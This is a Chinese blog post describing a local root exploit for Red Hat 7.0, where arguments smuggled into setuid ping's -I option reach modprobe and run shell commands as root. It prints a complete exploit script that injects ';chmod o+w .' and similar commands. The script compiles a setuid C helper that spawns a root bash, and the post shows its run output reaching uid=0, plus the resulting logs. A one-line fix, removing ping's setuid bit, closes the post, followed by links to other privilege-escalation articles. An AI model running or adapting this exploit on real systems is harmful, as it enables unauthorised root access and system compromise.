redhat7本地利用ping拿root漏洞详析

最新推荐文章于 2025-02-28 07:15:12 发布
原创 最新推荐文章于 2025-02-28 07:15:12 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redhat #shell #interface #socket #perl #测试

博客涉及Redhat系统,包含shell、socket、perl等技术,还提及测试相关内容,这些信息技术领域的内容是博客关键信息。
redhat7本地利用ping拿root漏洞详析
首先声明,本人及本人所在公司盖不对利用此漏洞所造成的损失负责。攻击代码不长,可以用shell或
perl来编写,推荐用shell写。

原理:
也许是redhat7的重大漏洞吧,他的ping程序的-I参数指定interface时通过modprobe和insmod执行任意代
码,大家都知道ping程序的权位是这样的:
[Hello!sune4gle]$?ls?-l?/bin/ping
-rwsr-xr-x????1?root?????root????????20604?Aug??8??2000?/bin/ping
ping程序调用了raw_socket的所有setuid位,呵呵,我们可以通过用ping的-I参数来ping一个不存在的ip
,当然ip前面的参数是关键,也就是我们的执行命令,s权位令我们以普通权限的uid来运行ping时的euid
为0,所以实际上我们在运行ping的一瞬间是以超级拥护的权限在执行命令的。这样如果我们运行如下的
命令的话:
[Hello!sune4gle]$ping?-I?';chmod?o+w?.'?195.117.3.59?&>/dev/null
就是把当前目录对其他用户可写了,呵呵,当然我们可以利用sleep语句来使该进程等待,利用等待的时
间我们可以写一个c程序,让他编译并且运行:
cat?>/x.c?<<_eof_
main()?{
??setuid(0);?seteuid(0);
??system("chmod?755?/;rm?-f?/x;?rm?-f?/x.c");
??execl("/bin/bash","bash","-i",0);
}
_eof_

gcc?/x.c?-o?/x
chmod?755?/x
到这里大家应该都明白了吧?呵呵在/下创建x.c文件,并且编译,使它也拥有s权位,呵呵就使一个
setuid的rootshell啦,以下是写好的攻击代码:
#!/bin/sh
echo
echo?"RedHat?7.0??exploit"
echo?"(c)?2000?suneagle?"
echo
echo?"Enjoy?hacking!?:)"
echo

PING=/bin/ping
test?-u?$PING?||?PING=/bin/ping

if?[?!?-u?$PING?];?then
??echo?"Sorry,?no?setuid?ping."
??exit?0
fi

echo?"Phase?1:?making?/?world-writable..."

$PING?-I?';chmod?o+w?.'?195.117.3.59?&>/dev/null

sleep?1

echo?"Phase?2:?compiling?helper?program?in?/..."

cat?>/x.c?<<_eof_
main()?{
??setuid(0);?seteuid(0);
??system("chmod?755?/;rm?-f?/x;?rm?-f?/x.c");
??execl("/bin/bash","bash","-i",0);
}
_eof_

gcc?/x.c?-o?/x
chmod?755?/x

echo?"Phase?3:?chown+chmod?on?our?helper?program..."

$PING?-I?';chown?0?x'?202.102.3.1?&>/dev/null
sleep?1
$PING?-I?';chmod?+s?x'?202.101.23.1?&>/dev/null
sleep?1

if?[?!?-u?/x?];?then
??echo?"Apparently,?this?is?not?exploitable?on?this?system?:("
??exit?1
fi

echo?"Ye!?Entering?rootshell..."

/x

echo?"Thank?you."

哈哈,好,我把这个shell程序在redhat7下的运行测试结果贴出来:
首先我得有个普通帐户,嘿嘿
[Hello!sune4gle]$?./getroot.sh

RedHat?7.0??exploit
(c)?2000?suneagle?

Enjoy?hacking!?:)

Phase?1:?making?/?world-writable...
Phase?2:?compiling?helper?program?in?/...
Phase?3:?chown+chmod?on?our?helper?program...
Ye!?Entering?rootshell...
[Hello!root]#?id
uid=0(root)?gid=500(sune4gle)?groups=500(sune4gle)
[Hello!root]#
攻击后的log:
Feb?24?11:16:27?sune4gle?modprobe:?modprobe:?insmod?;chmod?o+w?.?failed
Feb?24?11:16:30?sune4gle?modprobe:?modprobe:?insmod?;chown?0?x?failed
Feb?24?11:16:31?sune4gle?modprobe:?modprobe:?insmod?;chmod?+s?x?failed
解决方法:
去掉或限制ping程序的setuid位
[Hello!sune4gle]#?chmod?655?/bin/ping
CentOS 5.5提权exp
03-20
CentOS 5.5提权exp
redhat7本地利用pingroot漏洞 添加书签
蝈蝈俊.net
03-02 1714
本帖版权归原作者,其它网站转载须注明出处,传统媒体转载须事先与原作者和e龙西祠胡同[http://www.xici.net]联系。 作者: 大鹰 发表日期: 2001-02-24 02:00:25 返回《黑客也是侠》 快速返回 redhat7本地利用pingroot漏洞作者:大鹰suneagle@patching.net>首先声明,我不公布攻击程序的原代码,
利用linux漏洞提权
weixin_34337381的博客
05-11 663
    提权就是让普通用户拥有超级用户的权限。    本次试验漏洞适用于RHELt或CenOS系列5~6系列所有版本。主要利用/tmp/目录和/bin/ping命令的权限漏洞进行提权。    试验环境:腾讯云CentOS6.8    内核:2.6.32-642.6.2.el6.x86_641.查看系统环境2.创建普通用户进行权限测试3.开始提权操作    写一段C语言,用于提权    提权成功  ...
Redhat NTP任意代码执行漏洞CVE-2017-6458 4.2.8p10以下都受影响
weixin_33951761的博客
09-01 644
漏洞描述: 在构建具有自定义字段的响应数据包时, 在 NTP 中发现了一个漏洞。如果在ntp.conf文件中配置了自定义字段, 且字段名称特别长, 则包含这些字段的响应数据包会导致缓冲区溢出, 从而导致崩溃。 NTP较容易出现缓冲区溢出漏洞, 原因是当它将用户提供的数据复制到缓冲区的时候,并不能正确的判断缓冲区的大小是否足够。 攻击者可以利用漏洞在受影...
为什么执行ping命令时不需要root权限? 怎样让进程具有root权限?
认知 行动 坚持
03-02 8629
最近遇到一个问题, 需要让普通用户执行程序时具有root权限, 怎么办呢? 我们来看看ping, 它采用了raw socket, 需要root权限, 但是, 我们平常执行root命令的时候, 没有加sudo啊, 来探个究竟:ubuntu@VM-0-15-ubuntu:~/taoge/raw_soc$ ll `which ping` -rwsr-xr-x 1 root root 4...
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1970
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令不执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
RedHat7配置本地yum源(超细过程)
热门推荐
KingveyLee的博客
03-18 1万+
此方法亲测有效,适用于RedHat7版本所有的环境 一、环境准备 挂载iso的镜像文件在CD/DVD驱动器上,或者上传iso镜像文件至服务器上(需要进行额外的操作) 举例:如下,需要确保,已连接已打开,且CD/DVD上的介质符合当前操作系统的版本。 二、手动配置本地源 创建本地源文件夹: mkdir -p /mnt/cdrom 挂载镜像文件至指定的目录。 mount /dev/cdrom /mnt/cdrom 备份原本地源。 cp -rf /etc/yum.repos.d /etc/yu
redhat无网利用iso搭建本地yum源
最新发布
dreams_dream的博客
02-28 1044
第一种方法: 上传rhel8的iso文件到服务器。第二种方法: 如果是vmware等自己安装的虚拟机,可以直接挂载iso镜像到cd/dvd驱动,如下图:可通过df命令查找虚拟机挂载镜像所在位置:用于查看磁盘空间使用情况,包括已挂载设备和文件系统的使用情况。df -h以上注意提示不操作一般会在后面下载依赖时报下面类似错误。
RedHat Enterprise Linux 7 YUM源(本地/网络源)配置
weixin_68256171的博客
07-28 1362
—将光盘挂载到 /mnt 下当/mnt中有如图内容时,即挂载成功若挂载光驱/dev/sr0解决措施:查看该设备状态是否全部勾选。
RedHat/CentOS6系列和RedHat/CentOS7系列破解root密码
绮梦寒宵的博客
08-07 1626
相信很多朋友都有忘记了root密码导致进不去linux操作系统经历,可能还有经常忘记密码的朋友,哈哈,这里跟大家分享一下如何对linux系统进行破密。 RedHat/CentOS6系列的破密只要是进入单用户模式对root用户的密码进行修改,个人觉得6系列的破密比7系列的简单。 RedHat/CentOS6系列的破密 一、重启机器,如果第一时间出现的是下面的这种界面,则按任意一个字符进入启动界面; ...
redhat 7利用ISO配置yum源
IT圈黎俊杰
08-19 2994
1、基本信息描述 redhat版本redhat 7.5 ISO镜像文件存放路径及名称:/u01/soft/rhel-server-7.5-x86_64-dvd.iso   2、创建挂载目录与挂载ISO文件 [root@rac02 soft]# mkdir -p /mnt/cdrom [root@rac02 soft]# mount -o loop /u01/soft/rhel-ser...
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
Fengg--Focus Oracle
06-29 7553
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换到andy用户 su - andy 查看当前用户是谁 whoami 查看tmp目录权限 [andy@bogon tmp]$ ll -d /tmp drwx
Redhat 系列漏洞补丁加固
VincentQB的博客
05-30 5536
为了应付检查要求,需要对生产服务器Redhat系列发行版进行漏洞补丁加固,应付方法如下: 查询漏洞的网址: https://www.cvedetails.com/version/87783/Redhat-Enterprise-Linux-6.html 根据年份查找漏洞,判别一下该漏洞所在的软件是否是在服务器上使用的,建议对通用的软件进行漏洞补丁加固 如 CVE-2017-1000367 ...
redhat linux漏洞列表,教你入侵RedHatLinux
weixin_28839601的博客
05-15 1101
此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕LPD:网络打印服务的攻击而进行的。首先确定目标,假设是:www.XXX.com先让俺看看是不是连得上:C:\pingwww.XXX.comPingingwww.XXX.com[202.106.184.200]w...
RHEL5/6 系统提权
love_3556的博客
09-02 1966
shared -o /tmp/exploit payload.c
Linux 环境实现ping攻击
Jason___Bourne的专栏
05-02 4572
通过不断的ping局域网中的某个主机,可以达到几乎完全占用那个主机网速的效果,但自己的网速也废了,整个局域网的上网基本上也废来。所以这是一种同归于尽的攻击方式,实用性基本上不存在了。之所以做这件事,是因为最近在研读 TCP/IP解卷一 这本书,所以用代码实现了ping的功能,并且稍加改进成为了ping攻击的代码。 一、开发环境:Red Hat Enterprise Linux 6.0
Linux下查找漏洞的几种必备工具
cnbird's blog
01-19 6018
 Linux操作系统是一个开放源代码的免费操作系统,它不仅安全、稳定、成本低,而且很少发现有病毒传播,因此,Linux操作系统一直被认为是微软 Windows系统的劲敌。近年来,随着Linux操作系统在我国的不断普及,随着越来越多的服务器、工作站和个人电脑开始使用Linux软件,当然,越来越多的安全发烧友也开始对这个操作系统发生了浓厚的兴趣。本文的目的是希望用户以最快的速度对Linux下的精品Ha
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值